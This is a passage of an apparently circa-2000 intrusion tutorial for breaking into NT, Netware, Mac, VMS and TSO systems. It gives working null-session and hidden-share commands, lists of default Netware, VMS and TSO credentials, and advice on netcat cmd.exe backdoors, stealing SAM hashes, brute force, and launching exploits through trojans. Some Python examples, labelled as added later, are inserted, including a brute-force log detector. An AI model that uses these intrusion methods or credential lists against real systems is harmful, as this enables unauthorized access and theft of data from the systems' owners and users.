How To Break Into Computer Systems – Part2


- Release 3.0 -

Portwolf, 2000


Information Insemination
__________________________________________________
Windows NT
Netware
Miscellaneous OS’s
“Unbelievable… a Hacker!”
Elite Hacker Tactics
System Exploits
Firewall Penetration
__________________________________________________

Windows NT
Until recently, UNIX machines made up the vast majority of machines on the Internet. Windows NT (New Technologies) has eaten up some of that percentile. Now, somewhere between 10% and 20% of machines you’ll find on the Net are NT boxes. NT machines ship with, and are compatible with, almost as many services as UNIX, with a few differences. Generally, you won’t find as many open ports on a Windows box because they don’t use raw sockets like the various flavors of UNIX (a socket is a two-way connection between two computers, using any protocol). NT Server ships with IIS, an HTTP and FTP service. [censored] servers can also be purchased for NT machines. SMTP and POP3 servers come with Microsoft Exchange Server, which is pretty commonplace. One port that will give your target away as a Windows box is an open port 139. This is the port for NBT, or ‘nbsession’ according to some portscanners. UNIX machines use strictly TCP/IP for communications (making them ideal machines for the Internet), whereas NT uses Net BIOS (Net BIOS does not work over the Internet, so NT Servers must utilize Net BIOS over TCP/IP in order to do so), or what they call NetBEUI (Net BIOS Extended User Interface – which also uses Server Message Block, or SMB).

To connect to an NT machine, you must use Microsoft Client. Using MS Client to connect to the Net BIOS ports on a Windows machine is similar in nature to telnetting to port 23 on a UNIX machine. If you have Windows 95 / 98 / NT, you have Microsoft Client. It might not be installed, though. To check, go to Control Panel, then Network. You should then see a list of protocols you have installed on your machine. In order to use MS Client, you need NetBEUI, Client for Microsoft Networks, and (of course) TCP/IP. If you are missing any of these, click on ‘Add’ and add the appropriate client or protocol (you’ll probably need Windows disks). Also, some NetBEUI stuff only works if you have the latest version of Dial-Up Networking. Go to microsoft.com for the update.

To use MS Client, open a DOS box. The command you will be using is ‘net.’ Type ‘net’ to see a list of net commands. Some of these cannot be issued from a DOS window. The two you as a hacker should be concerned with are ‘net view’ and ‘net use’. If ever you come across a machine with an open port 139, there is a chance that the machine has open shares on it. A Windows share is a directory somewhere on the server (be it Windows 95, 98, or NT) that is set up to be accessed by others in the network. Sometimes they are password protected, sometimes not. Once connected to a share, you can use regular DOS commands (cd, mkdir, edit, etc.) to move about and manipulate files within it.
Shares come in two varieties: share level and user level. Share level shares (usually only found on Win9X peer-to-peer networks) are protected only by a single password. Anyone knowing that password can access that folder. User level shares are more UNIX-ish, in that your access to them depends on who you are logged in as. Unfortunately, you can only log into an NT machine if you have NT yourself (either NT Workstation or NT Server). When NT admins set up user level (NTFS) shares, they determine what users and groups (similar to UNIX groups) can access them. To look for shares on an NT box, at a DOS prompt type:

net view \\ip_address

If you get a message back saying that you need to log in before using net commands, you either don’t have the latest DUN, or you aren’t logging into your own machine (at the Windows Login screen). If the machine has shares (and most NT servers do), you’ll see something like:

Share    Description
-----    -----------
mktg     Marketing folder
lpt1     Printer 1
acct     Accounting folder

Here there are two shared folders, and a shared printer. If you have Windows 95 or 98, you’ll only be able to connect to these shares if they’re share level (not user level). To do so, type:

net use x: \\ip_address\sharename

Where x is the drive letter you want to map the share to. So if you wanted to map the mktg folder to your i: drive, you’d type:

net use i: \\123.54.87.9\mktg

If you get the message ‘The command completed successfully,’ your drive i: is now the mktg folder on your target machine. If you’re prompted for a password, the share is either share level and password protected, or user level and you won’t be able to map to it. You also may just plain be denied access. Once you decide to get an NT partition on your hard drive, you’ll be able to log in. So, if you knew that the Administrator (superuser – equivalent to root on a UNIX system) password was ‘letmein’, you’d type:

net use i: \\123.54.87.9\acct letmein /user:Administrator

to map i: to the user level share acct from your NT machine. You can also map a drive from the GUI, by right-clicking on My Computer, and then on ‘Map Network Drive.’ Another way to connect to NT machines is with the nbtstat command. To get very useful info on a particular NT box, at a command prompt, type:

nbtstat -A ip_address

If the machine is NT and has port 135 or 139 open, you’ll see a table full of valuable info. It might look something like:

Net BIOS Remote Machine Name Table

Name      Type      Status
------------------------------------
srv3      <00>      Unique    Registered
r7labs    <00>      Group     Registered
srv3      <20>      Unique    Registered
srv3      <03>      Unique    Registered
ghost     <03>      Unique    Registered

The hex code in angle brackets ( <these things> ) tells us what each entry in the table means. A code of 00 means NetBEUI name. The first entry, srv3 <00>, tells us that this is a name, and the Unique tells us that it’s the name of that computer. You now have the NetBEUI (Windows name) name of that box. The second entry, r7labs <00>, is also a name, and the Group tells us that this is the domain name. This is the Windows domain name – not necessarily the Internet domain name. The srv3 <20> code means that this machine has file sharing enabled – which means you’ll probably find shares with a ‘net view.’ Appendix C of this text has explanations for each hex code you’ll find with an nbtstat.
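An added example (not from the original text) that parses an nbtstat name table like the one above and reads off what a defender wants to know from it: the machine name, its Windows domain, whether file sharing is advertised (so the host's shares and their permissions need checking), and any logged-on user names leaked through the <03> entries. The sample table is constructed; the suffix meanings beyond <00>, <03> and <20> are standard NetBIOS suffixes that the text itself does not list.

```python
"""Parse the name table printed by `nbtstat -A` and report what each entry
advertises.  Added example, not from the original text.  The sample table is
constructed to match the one shown above; suffixes beyond <00>, <03> and
<20> are standard NetBIOS suffixes, not something the text lists."""
import re
from dataclasses import dataclass

# (suffix, Unique/Group) -> what that registration means.  <00> is a
# computer name when Unique and a domain/workgroup name when Group.
SUFFIX_MEANINGS = {
    ("00", "UNIQUE"): "computer (workstation) name",
    ("00", "GROUP"): "Windows domain or workgroup name",
    ("03", "UNIQUE"): "messenger service: computer name or logged-on user",
    ("20", "UNIQUE"): "file server service: file sharing enabled",
    ("1B", "UNIQUE"): "domain master browser (primary domain controller)",
    ("1C", "GROUP"): "domain controllers for the domain",
    ("1D", "UNIQUE"): "master browser for the subnet",
    ("1E", "GROUP"): "browser service elections",
}

# One table row: name, <hex suffix>, UNIQUE|GROUP, status.
ENTRY_RE = re.compile(
    r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)", re.IGNORECASE)


@dataclass
class NbtEntry:
    name: str
    suffix: str
    kind: str      # "UNIQUE" or "GROUP"
    status: str
    meaning: str


def parse_nbtstat(text):
    """Return one NbtEntry per table row; headers and rulers are skipped."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        name, suffix, kind, status = m.groups()
        suffix, kind = suffix.upper(), kind.upper()
        meaning = SUFFIX_MEANINGS.get((suffix, kind), "unknown suffix")
        entries.append(NbtEntry(name, suffix, kind, status, meaning))
    return entries


def summarize(entries):
    """What a defender reads off the table: the machine's name, its Windows
    domain, whether it advertises file sharing, and user names leaked via <03>."""
    computer = next((e.name for e in entries
                     if e.suffix == "00" and e.kind == "UNIQUE"), None)
    domain = next((e.name for e in entries
                   if e.suffix == "00" and e.kind == "GROUP"), None)
    file_sharing = any(e.suffix == "20" for e in entries)
    users = sorted({e.name for e in entries
                    if e.suffix == "03" and e.name != computer})
    return {"computer": computer, "domain": domain,
            "file_sharing": file_sharing, "users": users}


# Constructed sample, laid out like real nbtstat output.
SAMPLE = """\
       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
srv3           <00>  UNIQUE      Registered
r7labs         <00>  GROUP       Registered
srv3           <20>  UNIQUE      Registered
srv3           <03>  UNIQUE      Registered
ghost          <03>  UNIQUE      Registered
"""

if __name__ == "__main__":
    for entry in parse_nbtstat(SAMPLE):
        print(f"{entry.name:<8} <{entry.suffix}> {entry.kind:<6} {entry.meaning}")
    print(summarize(parse_nbtstat(SAMPLE)))
```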

Another way to connect to an NT machine is to add it to your lmhosts file (in your windows directory). Open a file called lmhosts (with no extension), and edit like so:

ip_address netbeui_name #pre

where ip_address is the IP address of your target, and netbeui_name is the name you got from the nbtstat. For an example, look at your lmhosts.sam file (but don’t use this file, only use lmhosts with no file extension). Next you want to load the file into your NetBEUI memory cache, with this command:

nbtstat -R

Now, go to your Start button, then Find, then computer, and type in the NetBEUI name of the computer. An icon representing that computer will appear – right click on it and then click ‘explore’ to connect to the machine. This is the GUI way to connect to NT machines. Again, if you’re not using NT, you won’t be able to log in.
Once connected, you’ll want to see what kind of permissions you have. Create and erase a file. Make and delete a directory. You could have only read permissions, or you may have read and write (read files and modify them). Standard DOS commands work, and any mapped network drives will also appear in Windows Explorer as if they were on your local machine (similar to UNIX NFS).
One thing that sets NT apart from UNIX is its Client/Server-ness. If you telnet to a UNIX box and run a program, it will be run on that machine, using its CPU and RAM. If you map a network drive to an NT server and run a command, it will be launched and run on your computer, using your resources. So if you upload an exploit, map a drive, and double-click on the sploit with Explorer, the exploit will run on your computer. It is possible to get programs to run on that machine instead of your own, which will be explained in the ‘Unbelievable…A Hacker!’ section.

Hacking NT
Most of the time shares will be user level, or at least password protected user-level. And if you aren’t logged in, net views will report no open shares (why would the system tell you what folders are shared to someone who hasn’t logged in?). So you have a few options. You could get the password hashes and crack them with L0phtCrack (explained later). Or, you could use Brute Force: write a batch file that connects to the share, then spits passwords from a wordlist (available all over). If you aren’t skilled at writing batch files, get yourself a good DOS book, and at least find out about commands and DOS environment variables. You could make yourself quite a powerful brute force share-cracker batch file in under 20 lines. I personally use VB for brute force engine making. Also, if you want to quickly search an entire (or even multiple) subnet(s) for open shares, use a share scanner such as Legion. But most likely you won’t be able to see (let alone map to) anything at first. So here are some steps to take in breaking into an NT server.
Follow steps one, two, and three in the ‘Getting Started – Your First Night as a Newbie’ section. Once done, you should have a handful of usernames, as well as know what ports are open on what machines, and what services are running on those ports. If port 21 is open, it’s probably IIS. If you can get in anonymously (username ‘ftp’ with any password), try using this command:

cd /c

Once in a while a misconfiguration will bring you to the system’s actual root directory (whereas with normal anonymous access you can’t go very high in the hierarchical filesystem). This usually doesn’t work, but is worth a shot. Use one of the [censored] methods explained earlier to determine the webserver (if port 80 is open). Both IIS and FrontPage are plagued with vulnerabilities. How to exploit these is explained in the ‘System Exploits’ section.
Any share whose name ends in a dollar sign is hidden, and won’t show up in a net view or if you use the GUI approach to viewing shares. To connect to them, you only need to refer to them by name. Common hidden shares are:

c$       The entire C: drive
d$       The entire D: drive (if it’s another hard disk or partition)
admin$   The \%systemroot% (\winnt) directory
ipc$     Inter-Process Communications – not really a share (explained shortly)

By default, all drives are shared but hidden, as is the winnt directory. So to map your drive e: to your target’s c: drive, you’d simply type:

net use e: \\38.57.128.2\c$ password /user:username

Or you could do it the GUI way (with nbtstat or Map Network Drive).
Another way to hack in would be to put a Trojan on the server. Netcat is a program you can use to bind programs to ports. One way to allow yourself a back door to a system is to bind cmd.exe (similar to Win9X’s command.com) to a port. NCX and NCX99 (available at technotronic.com) do this for you. Once you bind cmd.exe to port 80 or 99, you can telnet in and get a DOS prompt (how very UNIX like!)
Your ultimate goal is probably to get the password file. Unfortunately, NT stores the password hashes in the registry. Sometimes you’ll find a backup copy in \winnt\system32\repair\sam._, but if not you’ll have to resort to other methods of getting them. Once you do, you’ll use L0pht Crack to crack them.
A few programs will also aid you in hacking into NT networks. Ogre is a very useful NT scanning utility. It will scan ports, net view, and nbtstat every machine in an NT network. NAT is also a powerful Brute Force engine, and can log into NT networks even from a Win9X machine (though to log in yourself, you’ll still need NT). For more advanced NT vulnerability exploits, read the ‘System Exploits’ section. For more NT commands that you’ll need, type ‘net’ at a command prompt. For more info on each net command, type:

net command /?

NAT is a great tool for BF-ing NT machines too. Take your list of valid usernames and put them into a file for NAT to use, and use a small password file (the one that comes with NAT is good – add a few password guesses of your own too). Also, the latest version of Legion (2.1) will not only scan for shares, but will attempt to brute force any it finds, if the user so desires. Both programs are made by the Rhino9 team, NT hacking experts.

Here’s a newer vulnerability in NT. Remember the hidden ipc$ share? As I said before, it’s not really a share, per se: it’s not a shared folder. It’s a channel used by NT Domain Controllers (PDCs and BDCs) to exchange network information with each other. And a hacker could theoretically use this ‘channel’ to break in. Remember how groups work in NT. Like UNIX, certain files and folders are accessible only to certain users or groups. One built-in group of NT is called ‘Everyone’, which encompasses anyone logged into the domain. It’s possible for someone to connect to the IPC share and masquerade as an NT Domain Controller, thereby becoming a member of the ‘Everyone’ group. Without even logging in. Consider the following.

C:\hacker_toolz>net view \\202.53.198.1
System error 5 has occurred
Access Denied

NT Server 202.53.198.1 just told us to go to hell since we haven’t logged in. Heh – watch this:

C:\hacker_toolz>net use \\202.53.198.1\ipc$ "" /user:""

We just connected to the IPC share with a username of null (meaning none: /user:"") and a password of null (""). Also, notice that we didn’t specify a drive letter to map IPC to, since it’s not a standard share. What we’ve done is connect to 202.53.198.1’s IPC share in the exact same way another Domain Controller wishing to exchange data would. And that makes us part of ‘Everyone.’ It thinks we’re another server in its domain. Now watch:

C:\hacker_toolz>net view \\202.53.198.1
Shared resources at 202.53.198.1:
Share      Description
----------------------------------------
folder1    Mngr’s Folder
usenet     NNTP
printer    Printer

Now that we’re part of ‘Everyone’, the server just spilled its guts to us, when seconds ago it wouldn’t. This only works if the server you’re net view-ing is configured to allow the Everyone group to browse it. Can we map network drives to these shares and explore? There’s a good chance of that. You can also use the user2sid and sid2user tools (available at www.hackingexposed.com) to glean usernames (which makes brute force much easier). This is a well known vulnerability that is easily solved, but you’ll find this tactic works on lots of NT Servers.

One last note on NT hacking. The WINS (Windows Internet Naming Service) protocol is responsible for translating NetBEUI names (Net BIOS uses computer names instead of addresses) to IP addresses. To look at the WINS configuration of any computer, use the nbtstat command. Furthermore, the file lmhosts on any Windows machine will act as a mini WINS table if WINS itself is disabled (TCP/IP properties under Control Panel > Network).

Novell Netware
UNIX machines still claim most machines on the Net. NT is catching up, and between the POSIX and Win32 platforms, you won’t find much else on the Internet. Once in a great while, however, you just might run into a completely different operating system. Novell Netware used to be the biggest Client/Server Network Operating System around, and rivals NT to this day. So just in case you run into one of these foreign systems, here is a little info on Novell Netware.
NT’s core protocol (integrated with Net BIOS) is SMB. Netware, on the other hand, uses NCP (Netware Core Protocol) as its main protocol for serving files. Netware has been around for quite some time – the first version was command-line and sat on top of DOS. Now GUI clients exist for it, and version 5.X has been released. Like Windows NT, computing is not centralized (as in UNIX), and resources are distributed among the network. One computer may be a print server, one might be a mail server, another a file server.

The thing that makes Netware unique is what’s called the NDS database, or Novell Directory Services. The NDS is a little comparable to an NT network’s PDC registry. It is a hierarchical representation of the entire network. Everything on the network (users, servers, printers, logon scripts, etc.) is represented by an appropriate object in the NDS database. At the root of the NDS tree is the object ‘root,’ similar to a root directory. Stemming from the root object are one or more ‘organizational’ objects, comparable to subdirectories. Inside these objects can be more organizational objects, or what are known as ‘leaf’ objects, comparable to files. These leaf objects are what make up the conceptual network. Leaves include user objects, representing users of the network, server objects, representing servers, and so on. The organizational units exist for no other reason than to conceptually organize the network. The whole idea of an NDS is sometimes hard to grasp at first, due to its being so abstract, but it greatly eases administration.
When you refer to a specific file on a hard disk, you refer to its path. When you refer to an NDS object’s location, you refer to its context. Paths start with root at the left, such as:

C:\Winnt\programs\file.ini

Contexts, on the other, hand, start with the root at the right, such as:

.user22.market.UAS

where user22 is the object we are referring to. We don’t need to specify root because it’s assumed that root is always after the last organizational unit listed. The context above specifies the user22 object, which is in the organizational unit ‘market,’ which resides in the organization ‘UAS.’ When referring to objects absolutely (full context), you must start the context with a period (.), and separate each entry with a period also. Now if your current working context was .market.UAS (same concept as a current working directory), you could refer to user22 relatively (just as in UNIX or DOS filesystems) with simply:

user22

with no period.
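To make the context rules above concrete, here is a small resolver, an added example that is not from the original text or from Novell. It turns the names used above into absolute contexts and also handles one standard NDS naming rule the text does not cover: each trailing period on a relative name drops one container from the left of the current context.

```python
"""Resolve NDS contexts as the text describes them: a name that starts with
a period is absolute (the root is implied after the last component), and a
name without one is relative to the current context.  Added example, not from
the original text.  It also handles a rule the text does not cover: each
trailing period on a relative name drops one container from the left of the
current context (the NDS way of saying 'one level up')."""


def _parts(context):
    """'.user22.market.UAS' -> ['user22', 'market', 'UAS'] (root is implicit)."""
    return [p for p in context.split(".") if p]


def resolve_context(name, current_context):
    """Return the absolute context of `name`, e.g.
    resolve_context('user22', '.market.UAS') -> '.user22.market.UAS'."""
    if name.startswith("."):
        return "." + ".".join(_parts(name))          # already absolute
    stripped = name.rstrip(".")
    levels_up = len(name) - len(stripped)              # count trailing periods
    ctx = _parts(current_context)
    if levels_up > len(ctx):
        raise ValueError(f"{name!r}: cannot go above [Root] from {current_context!r}")
    return "." + ".".join(_parts(stripped) + ctx[levels_up:])


def split_context(context):
    """Split an absolute context into (leaf object, containers inner->outer)."""
    parts = _parts(context)
    if not parts:
        raise ValueError("empty context")
    return parts[0], parts[1:]


def to_path_style(context):
    """Render a context the way a filesystem path reads, root on the left,
    to make the right-to-left convention concrete:
    '.user22.market.UAS' -> '[Root]/UAS/market/user22'."""
    return "[Root]/" + "/".join(reversed(_parts(context)))


if __name__ == "__main__":
    print(resolve_context("user22", ".market.UAS"))
    print(to_path_style(".user22.market.UAS"))
```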
Now, Netware networks are usually GUI interfaces. If you ever connect to a Novell server over the Net, you will have to navigate it from the command line, though, unless you want to download GUI clients from www.novell.com. You map network drives to Netware volumes (similar to a Windows share) as you would to an NT machine, with the MAP command. You change your context and navigate the NDS with the CX command. In order to do this, you will need to get your hands on a Netware client. You can get a free command-line client at www.novell.com. Client32 is a good one.
Now each user in a Novell network is represented by a user leaf object on the NDS tree. So to log in as user22, whose object is in the marketing.UAS container, you have to log in as:

.user22.marketing.UAS

Mapping drives to Netware volumes (a volume is just like an NT share) is done in one of two ways. You can either specify the server name you are connecting to physically, such as:

map x: servername/volumename

or by its NDS object, such as:

map x: server_nds_object:volumename

When trying to break into a Novell server on the net, with say, an IP address of 212.14.6.2, you would issue this command (with a Novell client in a DOS box):

map x: 212.14.6.2/datafiles

where datafiles is the volume you want to connect to. It is beyond the scope of this text to get into great detail about all the commands and inner workings of Netware, so feel free to jump into a Netware book. Really.

Hacking Netware
Breaking into Netware servers is just like hacking into anything else: you need to know as much as you can about the OS. Plenty of exploits exist for Netware – www.hackers.com has a lot. So, if you want to crack a Novell system, complete steps one, two, and three of the ‘Getting Started – Your First Night as a Newbie’ section. Try to Brute Force the usernames you find. Also, there are a few public volumes attached to each Netware server by default.

Logon    This is accessible to everyone – logged on or not.
Public   This is accessible to anyone logged on, no matter who.
Sys      This is the system volume – phun to explore.

Here are some commonly used login names and passwords for Netware:

Username Password
Admin operator, supervisor, sysadm
Backup
Guest visitor, user
Netware
Novell NetWare
Public
Remote
Server
Staff
Supervisor admin, operator, sysadm, supervis, manager
System1
Tape backup
Test testuser
User
Visitor guest

Also, brute force programs and password crackers exist for Netware by the truckload, as well as exploits and other handy Novell hacking utilities. If you’re serious about hacking a Novell system, familiarize yourself with them.

Miscellaneous OS’s
Most of the systems you’ll find will be some sort of UNIX. A lot will also be NT. And a few might be Netware. And that’s about all you’ll find while exploring the Internet. But if you find yourself trying to break into a machine via its dialup modem, you might be connecting to an older mainframe. Twice in my life, though, I have telnetted to a machine to find the unfamiliar logon screen of a mainframe as well. Also, you might (which, by the way, happened to me) target a network for some reason – to find out that it’s a network of Macs (ugh)! I’m not going to spend much time on OS’s other than NT and UNIX, but here’s a little info on some others you might run into. For more info, hit a search engine or get a book.

MacOS
I hate Macs. Any OS without a command-line isn’t worth my time, and in my humble opinion, should be forced upon AOL users. Hackers generally like the OS’s that they hack into – which is why they stay up until four in the morning trying to break in. But you might have a more specific motive to breach the security of a particular network, and if it’s a Mac network, you’ll have to learn a little bit about it. Just don’t admit to it.
Macs connect using the proprietary protocol Appletalk. Surprisingly, this protocol is routable. Each subnet (a term that will confuse most any Mac user) is called a Zone. Appletalk can be run over IP, for the purpose of talking to TCP/IP networks. If the Appletalk network in question is connected to the Net, at least the proxy server has to have this dual protocol capability. If you ever find a Mac machine on the Net with a valid IP address, it is running Appletalk over TCP/IP.
The protocol used to share resources is called AppleShare. AppleShare is (at its application level) similar to NetBEUI. Folders are flagged as ’shared,’ and thereby made available to the rest of the network. Some are password protected, and require a username and password. Mac sysadmins tend not to be too security-savvy, though, and Guest access is usually possible. To access these folders, your computer will need to speak Appletalk, and you’ll need a client to connect to AppleShare servers. TSSTalk (available at www.thursby.com) is a free program that will configure both requirements for you. All you have to do with it is enter the IP address of the Mac, and it will show up in your Network Neighborhood. Double-click the computer icon and you’re off to hacking.

VMS
VMS (Virtual Memory System) was a popular mainframe OS a few years back. It runs on VAX machines, and rivaled UNIX in its popularity for hackers to try to crack. Finding a VAX on the Net is extremely rare, but finding one on the end of a dialup link isn’t. One thing that is stereotypical about VMS is its potential for security. If the VAX sysadmin knows what he’s doing (and rarely do complete idiots run OS’s as complex as VMS), the system can be very secure, including extensive logging, encryption schemes, restrictive privilege rules, and even hacker traps.
Many VAX machines are interconnected via MultiNet, making the VAX network a bit more client/server. The prompt of a VMS system looks something like:

$DISK3:[user21]

Where DISK3 means you’re currently on the third disk (most VAX’s have multiple disks, just like you can have a C: hard disk and a D: hard disk) and you are in the directory ‘user21’, which is probably a home directory. Once at a prompt, you can issue a variety of commands. ‘Telnet’ and ‘ftp’ both work, and function like their counterparts in the UNIX world. You can use ‘dir’ or ‘directory’ to get a listing of your present working directory. If you do, you might see something like:

Text4 [users, user21]
App2 [users, admin]

Where text4 is the name of the file, and the brackets represent permissions. User21 owns the file text4, and is in the ‘Users’ group. With the command ‘cdup’ you can jump to the root directory of your disk, at which point your prompt would look like:

$DISK3:[000000]

And if you wanted to view a file, you’d use the ‘type’ command, just like in DOS. ‘Rm’ deletes files, like in UNIX. ‘Rmdir’ removes an entire directory, and ‘mkdir’ creates them. You must have the appropriate permissions in your PWD to do this, of course. If ever you try to read, copy, move, run, or delete a file, you might get a message like:

%RMS-E-PRV, insufficient privilege or file protection violation

Meaning you don’t have the privileges to access the file in question.
VAX machines on the Net will have very few ports open, so your hacking options will be limited. And if you dial into the mainframe, that’s (obviously) your only point-of-entry. Brute force is the only for-sure way to get that initial account and further hack a VAX. Here is a list of commonly used usernames and passwords for VMS:

Username    Password
SYSTEM      OPERATOR, MANAGER, SYSTEM, SYSLIB
OPERATOR    OPERATOR
SYSTEST     UETP, SYSTEST, TEST
SYSMAINT    SYSMAINT, SERVICE, DIGITAL
FIELD       FIELD, SERVICE
GUEST       GUEST, (unpassworded)
DEMO        DEMO, (unpassworded)
TEST        TEST
DECNET      DECNET

TSO
I include IBM’s TSO only because I’ve seen a couple on the Net, and dialed into a few. You’ll know a TSO machine by either its login prompt:

IKJ56700A ENTER USERID:

Or by the way it responds to a bad login:

IKJ56943I USERID (whateveryoutyped) NOT AUTHORIZED TO USE TSO

And if you do login, you’ll either be presented with a menu system or a command prompt. Old colleges sometimes connect TSO machines to their network to hold legacy databases, such as books and the like. If you’re presented with a menu system, issue a variety of obscure (and long) commands to break out into a prompt. If you enter an invalid command, you’ll usually get an error message that says something about ‘an unrecognized transaction.’ Here is a list of commonly used TSO login names and passwords.

Username    Password
Admin       adm
Guest
Init
Maint
Systest     test
Test1       test
Tso

There are many more mainframe operating systems out there. Most of them, though, you’ll never see, especially on the Net, since computing has become more decentralized and client/server over the years. Many hackers won’t even bother with these dinosaurs. If you ever run into one, though, and want to explore, get yourself an older hacking text, like The Neophytes Guide to Hacking (where I got some of the stuph above), or something similar. Hackers.com has a few older texts like this. I’ll personally stick to UNIX and NT.

“Unbelievable – a Hacker!”
The object of your hack will most likely be to obtain root, i.e., total control over the network. With a rootshell (any shell with root privileges, such as the superuser account) you can read, write, and execute everything on the network (or at least that particular computer). To obtain root, you’ll probably have to break in with some other account first. From there you can run a local exploit, download the password file, or whatever. If it’s an NT machine that you’re hacking, you probably want either the Administrator’s account, or at least to have a Trojan or RAT installed on it to give you total control. In this section I’ll go into the various means of getting root (or equivalent).

Brute Force
Brute Force is the simplest hacking technique, yet oftentimes provides results. When all else fails, you might be left with no other option than a brute force attack. This means hurling usernames and passwords at the system until it cracks. Use the list of commonly used UNIX combinations that supplements this text. Spend time trying to crack individual email addresses. Honestly, you haven’t made a full-hearted brute force attempt until you’ve spent at least two or three hours doing nothing but trying different combinations. Since UNIX login prompts won’t tell you if you’ve used a valid login name or not, narrow it down! Here is a quick list on how to obtain usernames:

· If port 59 ([censored]) is open, you will be able to obtain lots of usernames. Telnet in!
· Telnet to port 25 (SMTP) and use the VRFY command to verify the existence of usernames. Type HELP for more commands.
· Any email addresses on the network’s website will be valid usernames.
· Look at the /etc/passwd file of any UNIX machine (including one of your own). There are tons of default usernames that get used all the time.
· NT: using a null IPC session and the SID tools (explained in the ‘Elite Hacker Tactics’ section) you’ll be able to get every username for a PC or domain.

When you first target a system, before going into finding exploits and the like, spend a few minutes BF-ing some common accounts. Wouldn’t you be pissed if you spent hours compiling an exploit to find that the root password was simply ‘root’?
Also, you could write a program (or shell script if you have a UNIX box yourself) to spit usernames and passwords from a dictionary wordlist file at the system (available all around the Net, usually in supplement to password crackers).
If you want to become eleet eventually, you’ll need to learn at least a little about at least a few programming languages. The easiest (yet still effective) language to learn, especially for newbies, is Visual Basic. I once wrote a VB prog that used NetCat, and repeatedly telnetted to my target and spat usernames (from a list that I compiled that I knew to be valid usernames) and passwords (from a huge dictionary file), and redirected all output to my screen and a log file. I’m no programming expert, but with an hour of coding and another of debugging, all I had to do was sit back and watch as my little proggie automated a brute force attack with decent speed. Ready-made BF progs exist too. Unsecure is a decent one for FTP and Telnet login prompts. NAT is great for NT. Just remember – brute force will always work, eventually.
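The flip side of the brute force described above is that it is loud: one source producing a burst of failed logins, often across several usernames, sometimes followed by a success. Here is an added example (not from the original text) of the detection logic an administrator runs over FTP/telnet authentication logs to spot that pattern. The log line format and the sample lines are constructed for this example; adapt the regex to whatever your daemon really writes.

```python
"""Detect the brute-force pattern described above (one source hurling
username/password pairs at a login prompt) from authentication logs.
Added example, not from the original text.  The log line format and the
sample lines are constructed; adapt LOG_RE to your daemon's real format."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed format: "<date> <time> <daemon> <source ip> user=<name> result=OK|FAIL"
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (?P<svc>\w+) (?P<src>[\d.]+) "
    r"user=(?P<user>\S+) result=(?P<result>OK|FAIL)$")


def parse_line(line):
    """Return a dict for an auth record, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%d %H:%M:%S")
    return d


def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=10)):
    """Return one alert per source that produced `threshold` or more failed
    logins inside any span of length `window`.  A later success from the
    same source is reported too: that is what a brute force that worked
    looks like in the log."""
    events = [e for e in (parse_line(l) for l in lines) if e]
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)
    alerts = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if e["result"] == "FAIL"]
        start = 0
        for end in range(len(fails)):
            # Slide the window start forward until it fits inside `window`.
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            if end - start + 1 >= threshold:
                first_fail = fails[start]["ts"]
                later_ok = [e for e in evs
                            if e["result"] == "OK" and e["ts"] >= first_fail]
                alerts.append({
                    "src": src,
                    "failures": end - start + 1,
                    "users": sorted({e["user"] for e in fails[start:end + 1]}),
                    "first": fails[start]["ts"],
                    "last": fails[end]["ts"],
                    "success_after": later_ok[0]["user"] if later_ok else None,
                })
                break   # one alert per source is enough
    return alerts


# Constructed sample: one fast burst (10.0.0.5), one slow trickle that stays
# under the rate (10.0.0.9), one normal login, and one unrelated line.
SAMPLE_LOG = """\
2000-03-12 02:14:07 ftpd 10.0.0.5 user=root result=FAIL
2000-03-12 02:14:09 ftpd 10.0.0.5 user=root result=FAIL
2000-03-12 02:14:12 ftpd 10.0.0.5 user=admin result=FAIL
2000-03-12 02:14:15 ftpd 10.0.0.5 user=ftp result=FAIL
2000-03-12 02:14:20 ftpd 10.0.0.5 user=root result=FAIL
2000-03-12 02:14:25 ftpd 10.0.0.5 user=admin result=FAIL
2000-03-12 02:14:30 ftpd 10.0.0.5 user=root result=OK
2000-03-12 02:00:00 telnetd 10.0.0.9 user=guest result=FAIL
2000-03-12 02:30:00 telnetd 10.0.0.9 user=guest result=FAIL
2000-03-12 03:00:00 telnetd 10.0.0.9 user=guest result=FAIL
2000-03-12 03:30:00 telnetd 10.0.0.9 user=guest result=FAIL
2000-03-12 04:00:00 telnetd 10.0.0.9 user=guest result=FAIL
2000-03-12 02:20:00 telnetd 10.0.0.7 user=bob result=OK
this line is not an auth record
"""

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(alert)
```

The slow trickle from 10.0.0.9 is deliberately below the rate; lowering `threshold` or widening `window` is the knob for catching patient attackers, at the cost of more false positives.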

Local Xploits
A local sploit (exploit) is a program that exploits some security bug inherent in the operating system, and will greatly increase your access levels, oftentimes to root. A local exploit (as the name implies) is something you’ll have to run on the system you’re hacking. If it’s UNIX, you can telnet in and run it. If it’s NT, you’ll have to use one of the following methods to run the exploit (remember that running a program on a remote NT machine from a mapped network drive will launch it on your computer).
· Run it with a Trojan such as Netbus or Back Orifice.
· Put the exploit in the cgi-bin directory if its a webserver, and request it with your browser.
· Use the scheduling (AT) command to run it – Admins only.
· Use NCX or NCX99 to telnet in and run it.
· Put it in a batch file and have some other user run it.

